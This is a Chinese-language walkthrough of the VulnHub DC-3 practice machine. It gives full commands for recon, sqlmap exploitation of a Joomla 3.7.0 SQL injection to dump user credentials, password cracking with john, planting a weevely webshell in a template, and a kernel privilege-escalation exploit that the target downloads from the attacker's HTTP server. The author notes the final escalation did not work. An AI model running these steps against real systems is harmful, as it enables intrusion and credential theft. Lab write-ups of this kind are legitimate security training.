综合实战第二章
DC-3
环境准备
靶场下载:https://www.vulnhub.com/?page=2&q=dc
攻击机:kali 192.168.3.134
靶机:DC-3 192.168.3.164
信息搜集
喜闻乐见的信息搜集
nmap -p- -A 192.168.3.164
只开放了一个80端口,用的是Joomla
这个cms
可以再用Whatweb
扫描一下
whatweb http://192.168.3.164
接下来用扫描工具joomscan
扫描一下
joomscan --url http://192.168.3.164
找到后台地址
访问看一下
查看一下有没有这个cms的漏洞
searchsploit Joomla 3.7.0
查看一下第一个
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt 42033.txt
漏洞利用
使用sqlmap
sqlmap -u "http://192.168.3.164/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
爆出库名,接下来查看表名
qlmap -u "http://192.168.3.164/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
找到#__users
这张表
爆破字段名
sqlmap -u "http://192.168.3.164/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]
接下来扫一下信息
sqlmap -u "http://192.168.3.164/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C name,username,password --dump -p list[fullordering]
破解密码
把密码放在一个文件里面
john mima
出来了
尝试登录
成功进入后台
上传木马
我们可以通过一些手段上传木马
首先点击这个
随便点一个进去
可以看到我们能新建文件,那么建立一个测试文件
然后访问
http://192.168.3.164/templates/beez3/test.php
没有问题
可以制作木马了
weevely generate 123456 webshell.php
把生成的东西复制过去,保存
连接
weevely http://192.168.3.164/templates/beez3/test.php 123456
shell
提权
查看一下/etc/passwd
cat /etc/passwd
有一个dc3
再找找别的线索
find / -user root -perm -4000 -print 2>/dev/null
没什么有价值的信息
uname -a
查看版本内核
lsb_release -a
16.04版本的,用searchsploit查找一下漏洞
searchsploit Ubuntu 16.04
随便用,就用这个39772
cp /usr/share/exploitdb/exploits/linux/local/39772.txt 39772.txt
通过文档我们要在git上下载东西
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
如果靶机网速慢可以在本机先下载
然后
python -m SimpleHTTPServer
再让靶机下载
wget http://192.168.3.134:8000/39772.zip
解压
unzip 39772.zip
发现有两个tar文件
tar -xvf exploit.tar
进入目录
cd ebpf_mapfd_doubleput_exploit
编译
./compile.sh
按理说
./doubleput
就直接能提权了,但我没成功,不知道咋回事